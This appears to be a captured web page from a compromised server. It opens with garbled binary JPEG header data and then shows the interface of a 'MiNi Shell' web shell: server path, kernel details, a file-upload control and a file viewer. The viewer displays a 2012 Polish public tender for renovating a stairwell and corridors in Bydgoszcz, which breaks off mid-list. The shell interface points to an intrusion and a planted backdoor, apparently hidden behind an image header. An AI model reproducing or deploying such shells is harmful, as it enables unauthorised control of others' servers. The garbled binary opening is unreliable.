JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/282630-N-2012.html

<p class="kh_header"><b>Bydgoszcz: remont klatki schodowej i korytarzy w bud. nr 1 
przy ul. Warszawskiej 10 Bydgoszcz</b><br>
<b>Numer ogłoszenia: 282630 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd  Infrastruktury , ul. Podchorążych 33, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052/3784285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.hg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remont klatki schodowej i korytarzy w bud. nr 1 
przy ul. Warszawskiej 10 Bydgoszcz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont klatki schodowej i korytarzy w bud. nr 1 
przy ul. Warszawskiej 10 Bydgoszcz
Roboty remontowe obejmują:
1.	Wykonanie robót malarskich klatki schodowej.
2.	Wykonanie nowej okładziny biegów schodowych.
3.	Wymiana okien na PCV - 7 szt.
4.	Wymiana drzwi zewn. na aluminiowe - 1szt.
5.	Roboty pozostałe (drzwi stal. p.poż., i inne)
6.	Wymiana instalacji elektr. oświetleniowej.
7.	Roboty instalacji  c.o. (grzejniki)
8.	Okna PCV i przegrody alumin. korytarzy
9.	Posadzka Tarkett w korytarzach
10.	Drzwi alumin. o EIS-30 na klatce.
Roboty  malarskie . 
1.  Zabezpieczenie  posadzki folią (lub tekturą) ochronną.
2.  Powłoki  malarskie :
Sufity :   -  mycie i skrobanie starej farby
-  wzmocnienie podłoża emulsją Uni-Grunt
-  dwukrotne szpachlowanie powierzchni gipsem szpachlowym
-  malowanie 2 x farbą emulsyjną białą.
Ściany : -  zmycie starych powłok emulsji
-  wzmocnienie powierzchni preparatem Uni -Grunt
-  dwukrotne szpachlowanie gipsem szpachlowym
-  malowanie 2 x farbą emulsyjną w uzgodnionym kolorze.
    Zamiast  lamperii - wykonanie  tynku  mozaikowego  żywicznego :
-  punktowe nakłucie pow. malatury
-  warstwa  kontaktowo - sczepna  ( np. Cerplast )
-  warstwa pośrednia - emulsja gruntująca (wg wskazań producenta pod konkretny tynk żywiczny)
 - tynk mozaikowy cienkowarstwowy żywiczny - dekoracyjny, wodoodporny (w kolorystyce   uzgodnionej z Użytkownikiem)
3.   Stolarka drzwiowa: po oczyszczeniu 2 krotne malowanie f. olejną w kolorze.
4.   Elementy metalowe tj. grzejniki, rury instalacyjne kraty, itp. oczyścić, zabezpieczyć przez pomalowanie 2 x farbą olejną  (pod  kolor ścian).
Okładziny  schodów .     
1.  Skucie cokolika cementowego łącznie z naprawą tynkarską podłoża.
2.   Odtłuszczenie kamiennej posadzki podestów i stopni schodowych.
3.   Nakłucie - zmłotkowanie  podłoża kamiennego w celu uzyskania odpowiedniej  przyczepności.
4.	Warstwa szpachlowa wyrównawczo - wypełniająca zagłębienia i ubytki pow. schodów - zaprawa klej.               o zwiększonej przyczepności do trudnych podłoży ( np. Cerinol , Atlas Pl. , Atlas Prog. Mega , lub  inna ).
5.	Ułożenie posadzki z płytek Gress typu Tartan o wym. 30x30 cm (matowe , odporne na ścieranie                             i zaplamienia , V klasy twardości) , na kleju o zwiększonej przyczepności do trudnych podłoży, metodą   w karo ( po obwodzie, ze stopnicy prostym wzorem ) ; wypełnienie spoin fugą wodoodporną gr. 2 mm.
6.	Wykończenie spoczników i biegów schodowych cokolikiem z płytek gressowych  j.w.  wys. ~ 10 cm,                   z  ułożeniem listwy dekoracyjnej  PCV -  flizówki  (w  dopasowanej  barwie).
Wymiana stolarki okiennej  (kl. sch.).  
 1.  Okna klatki schodowej z PCV o  architekturze  wg  zał.  rysunków  do  S.T. 
      -  łącznie  7 szt.  o  parametrach :   
    -  profil min. 5 - komorowy z kształtowników z nieplastyfikowanego  PVC w  jednym  systemie  koloru  białego 	 
      -  profil  wzmocniony  stabilizatorem  wapniowo-cynkowym z  całkowitym      
                 wyeliminowaniem  metali  ciężkich  ( kadmu, ołowiu ) 
     -  współczynnik  izolacyjności  termicznej :
dla części nieprzeźroczystej    Ur =  1,45 W/m2*k 
dla zestawu szybowego  Us min.= 1,0  W/m2*k  
     -  izolacyjność akustyczna dla okna nierozszczelnionego  min Rw >35 Db
     -  okucia  obwiedniowe z możliwością ręcznej regulacji (bez użycia klucza)
     -  w każdym  skrzydle  zaczep  antywyważeniowy   
     -  klamki  białe  we  wszystkich  skrzydłach.
        2.  Okna klatkowe łukowe o wym. :     
- 0,95 x 2,10 m   -   2 szt.   (wg rys.) 
- 0,95 x 2,05 m   -   2 szt.  
- 0,85 x 1,73 m   -   3 szt.  
                   -   wys. łuku : 0,60 m (0,65 i 0,53 m)
 -  dwudzielne :  góra 1 skrz. całkowicie  uchylne, dół 1 skrz. rozwier. - uchylne (pośrodku słupek pionowy stały, poziome szprosy w 2 rzędach) 
        3.  Parapety  wewnętrzne z tworzywa PCV , białe , o wymiarach : 
                             -  1,10 x 0,20 m   -   4 szt.
                             -  1,00 x 0,35 m   -   3 szt.
             ze  stabilną  konstrukcją  mocującą .
        4.  Obróbka ościeży okiennych odpowiednią szpachlówką z ewentualną miejscową  reperacją tynku.                                                               
        Uwaga : Nowe okna muszą koniecznie zachować istniejący wygląd architektoniczny. 
        Wymiana stolarki drzwiowej      
       Drzwi wejściowe na klatkę schodową, aluminiowe o architekturze wg zał. rys. do S.T. -  1 szt., o parametrach :
                   -   wymiary :  2,0 x 3,08 m  ;  kolor  brązowy 
                   -   wykonane zgodnie z wymogami p. poż. 
                   -   dwuskrzydłowe : 1 skrzydło otwierane na zewnątrz , szer. 1,0 m  2 skrzydło (zastrzałowe)     
                   -   profil aluminiowy ciepły, szeroki ramiak 
                   - górna część - przeszklone naświetle (o b. łagodnym łuku, szyba bezpieczna, gr. min. 5 mm)                                                   
                   -   dolna część  -   poszycie  pełne 
                   -   zaopatrzone  w  :  -  zamek patentowy (ilość wg potrzeb Użytkownika)
                                                     -  kpl. okucie
                                                     -  samozamykacz  
                                                     -  plombownicę
                                                     -  próg 
Inne  roboty  kl. schod.    
1.  Demontaż stalowej kraty - w przejściu na strych.
2.  Zabudowa powstałego przejścia ścianką z gazobetonu grub. 24 cm , wykonaniem  nadproża (2L-19/1,30m) i osadzeniem drzwi stal. oraz jednostronnym  otynkowaniem - tynk zw. kat. III.
3.  Osadzenie na poddaszu 2 szt. drzwi stal. p.poż. 1-skrzydł. płaszczowych o wym. 1,0x2,10 m o odporności ogniowej EI-30  - Mat. Inwestora  (1 szt.-w wymurowanej przegrodzie j.w./P ; 1 szt. - z wymiany /L) .
4.  Posadzka lastrykowa poddasza - oczyścić, odtłuścić i pomalować 2x farbą olejną.
5.  Ochrona naroży ściennych poprzez wzmocnienie kątownikami aluminiowymi.  
6.  Wymiana drewnianych poręczy schodowych (z uchwytami mocującymi) , na 
     wzór klatki nr 1, i  dwukrotną  konserwacją oszlifowanego drewna -  lakierobejcą (w dobranym kolorze).
Korytarze  - okna i przegrody . 
1.  Wymiana okien korytarzowych na PCV o architekturze jak na zał. rys. do S.T.
      -   parametry okien :  jak dla klatki schod. gł.
      -   okna łukowe o wymiarach :  1,14 x 2,22 m  -  3 szt.  (wg istn. wzoru)  
górna cz.  - uchylna
dolna cz. - 1 skrzydło rozw.- uchylne    
pośrodku słupek stały, poziome szprosy w 2 rzędach
wysokość łuku - 0,70 m 
       -   wymiana parapetów na PCV , białe o wymiarach 30 x 115 cm ze stabilną konstrukcją mocującą                 (lub nakładka)
     -   obróbka ościeży okiennych .
2.   Wymiana okien klatek schod. bocznych na PCV o architekturze jak na zał. rys.      do S.T.  
               -  parametry okien :  jak dla klatki schod. gł.
               -  okna łukowe o wymiarach :  0,60 x 1,15 m -  6 szt.  (wg istn. wzoru)
                        górna cz. ( łuk. )   -  stała 
                        dolna cz.                -  rozwieralna
                        pośrodku pozioma szprosa            
               -  wymiana parapetów na PCV , białe o wymiarach 40 x 75 cm (stabilne)
               -  obróbka ościeży okiennych ( zakres  j.w. ).
3.   W miejsce zdemontowanej kraty klatki bocznej ewakuacyjnej osadzić przegrodę 
      drzwiową aluminiową o architekturze jak na zał. szkicu do S.T.  - 1 szt. 
               -  przegroda drzwiowa łukowa o wym. 1,73 x 3,03 m
               -  naświetle stałe przeszklone szkłem gr. min. 4 mm 
               -  odporność ogniowa  EI - 30  (certyfikat)
               -  1 skrzydło otwierane na schody szer. 1,0 m  - Lewe
               -  2 skrzydło z zasuwą boczną
               -  kpl. okucie (z zamkiem patentowym). 
Korytarze - rob. pozostałe budowlane 
1.  Demontaż krat okiennych ( i zdanie na Mag. )
2.  Rozbiórka przegród działowych w III cz. korytarza + naprawa tynkarska  powstałych bruzd.
3.  Ochrona kątownikami metal. narożników ściennych.
4.  Wykonanie na klatkach bocznych (podestach i biegach) posadzki typu Gress (Tartan) ze stopnicą ryflowaną  z uprzednim zmłotkowaniem podłoża, wykonaniem warstwy gruntująco-sczepnej ; na zaprawie klejowej               i spoinie wodoodpornej. Płytki Gress o wym. 30x30 cm , w V klasie ścieralności.
5.  Powłoki malarskie :
-  likwidacja nielicznych zacieków ,
-  korytarze I, II, III :
sufit i ściany - malowanie 2x farbą emulsyjną z przygotowaniem pow.(sufit na biało, ściany w kolorze)
lamperia  -  malowanie 2 x f. olejną z 1x szpachlowaniem
- klatki boczne - zmycie starej farby , gruntowanie, szpachlowanie 2x , malowanie emulsyjne (sufity   2x na  biało , ściany 2x w kolorze),
-  belki i ciosy podsufitowe - oczyścić, rysy zakitować, miejscowo wyszpachlować i pomalować                   2- krotnie farbą olejną,
 -  grzejniki , rury c.o., inne  elem. (kraty, szafki elektr., poręcze drew.) - oszlifować  z łuszczącej się farby i pomalować 2x farbą olejną (do metalu lub drewna)
 -  stolarka drzwiowa - oczyszczoną pow. pomalować 2x farbą olejną z wyodrębnieniem tzw. brudników; na drzwiach należy umieścić numerację cyfrową pomieszczeń : szablony cyfrowe z folii samoprzylepnej : wys.4 cm i szer.2,2 cm 
        - nakleić wg układu podanego przez inspektora nadzoru.  

    Korytarze  -  posadzka  Tarkett .  
1.  Zerwanie cokolika cementowego i naprawa tynkarska powstałej bruzdy.  
2.  Zmłotkowanie podłoża w celu uzyskania niezbędnej przyczepności.
3.  Zagruntowanie podłoża bet. emulsją lub masą sczepno - kontaktową.
4.  Wylewka z zaprawy samopoziomującej grub. 5 mm.
5.  Posadzka z wykładziny homogenicznej typu TARKETT, min. dwubarwna, z wykonaniem (miejscowo) warstw wygładzających, szlifowaniem i wywinięciem cokolika na wys. 10 cm, oraz zakonserwowaniem                   3-krotnie polimerami.
6.  Obsadzenie listew mosiężnych w progach drzwiowych i na stykach końcowych. 
 Klatka - drzwi aluminiowe  (parter, I, II p.)              
1.  Wymiana  wskazanych przez Użytkownika drzwi na aluminiowe  EIS 30
               -  pełne o wym. zewn.  1,12 x 2,14 m  -  4 szt./ L  (białe)
               -  z szybą o wym.             1,10 x 2,10 m  -  1 szt./ L   (szyba 0,95x1,02m)  
               -  klasa odporności ogniowej EIS 30  (Aprobata Techn. Inst.Tech.Bud.) 
               -  wyposażone w samozamykacz, okucie, 2 zamki (z wkładką i górn.patent.) 
     Drzwi powinny być obsadzone w sposób zapewniający max stabilność montażu. 
2.  Poszerzenie (przez rozkucie) niezbędnych otworów drzwiowych i ułożenie  nadproży prefabrykowanych , dł. ~1,30 m              
3.  Zamurowanie wskazanego otworu - bloczkami z gazobetonu na gr. 24 cm. 
Przedmiotowe prace wykonać zgodnie z zał. przedmiarem robót. 
    Roboty elektryczne .  
I.   Klatka schodowa gł.:
1.  Demontaż  istniejących opraw oświetleniowych  - do odzysku i ponownym ich założeniu po  wykonaniu  nowej  instalacji  elektrycznej,
2.  Demontaż starej instalacji elektrycznej i osprzętu instalacyjnego oświetlenia klatki schodowej,
3.  Wykonanie nowej instalacji elektrycznej oświetleniowej 3-przewodowej , tj. w układzie sieciowym           TN-C-S , zasilanej z istniejącej tablicy rozdzielczej  ( parter ) wraz  z  montażem  automatu  schodowego,
4. Wykonanie pomiarów elektrycznych rezystancji i skuteczności ochrony przeciwporażeniowej                         dla wykonanych instalacji elektrycznych.  
II.   Korytarze (I, II, III):
1. Demontaż istniejących opraw oświetleniowych i montaż nowych opraw świetlówkowych 2x36W              z kloszem,
2. Demontaż starego osprzętu instalacyjnego i montażu nowych łączników z zachowaniem                               ich dotychczasowych funkcji,
3. Wykonanie pomiarów elektrycznych skuteczności ochrony przeciwporażeniowej dla istniejących instalacji elektrycznych.  
Roboty demontażowe  
Materiały uzyskane z demontażu Wykonawca przekazuje do utylizacji na swój koszt.
Roboty montażowe  
Mocowanie opraw oświetleniowych i osprzętu instalacyjnego wykonać w dotychczasowych miejscach (lub w uzgodnionych z inspektorem nadzoru ).
Roboty sanitarne.
Należy zdemontować grzejniki żeliwne i zdać do magazynu WAK-5 ( ul. Gdańska )
W miejsce starych żeliwnych - zamontować grzejniki blaszane dwupłytowe Compakt
lakierowane w kolorze białym z zasilaniem bocznym o wym. 600x1000 - 3 szt. i 900x700 - 2 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.00.00-9, 45.44.00.00-3, 45.43.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w kwocie: 7000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zgodnie z art. 3 ust. 3 pkt. 22 ustawy o odpadach z dnia 27.04.2001 (Dz.U z 2010r Nr 185, poz. 1243 z późn. zmianami), wytwórcą odpadów powstających w wyniku świadczenia usług związanych w wykonaniem przedmiotu zamówienia jest wykonawca. W związku z powyższym powinien posiadać odpowiednie pozwolenia w zakresie wytwarzania, zbierania, transportu i odzyskiwania lub unieszkodliwiania odpadów.  
           - Warunek oceniony zostanie na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na potwierdzenie spełniania ww. warunku wykonawca musi wykazać się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie, minimum                     1 roboty budowlanej o zakresie i wartości zbliżonej                             do przedmiotowego zadania (tj. roboty ogólnobudowlane, w tym roboty remontowe i renowacyjne, roboty w zakresie stolarki budowlanej, roboty w zakresie instalacji elektrycznych i roboty instalacyjne w zakresie urządzeń sanitarnych) o wartości minimum 100.000,00 zł brutto.
- warunek oceniony zostanie na podstawie złożonego oświadczenia i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku wykonawca musi wykazać się dysponowaniem osobami legitymującymi się kwalifikacjami odpowiednimi                    do stanowisk, jakie zostaną im powierzone. Wykonawca wraz z ofertą przedstawi:
- jedną osobę proponowaną na stanowisko kierownika budowy,                      posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń i zrzeszoną w Okręgowej Izbie Inżynierów Budownictwa oraz posiadającą uprawnienia do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE i zaświadczenia o przeszkoleniu w zakresie ochrony informacji niejawnych;
-   wszystkie osoby przewidziane do realizacji zamówienia, posiadające uprawnienia do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE i zaświadczenia o przeszkoleniu w zakresie ochrony informacji niejawnych;
-warunek oceniony zostanie na podstawie złożonego oświadczenia i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
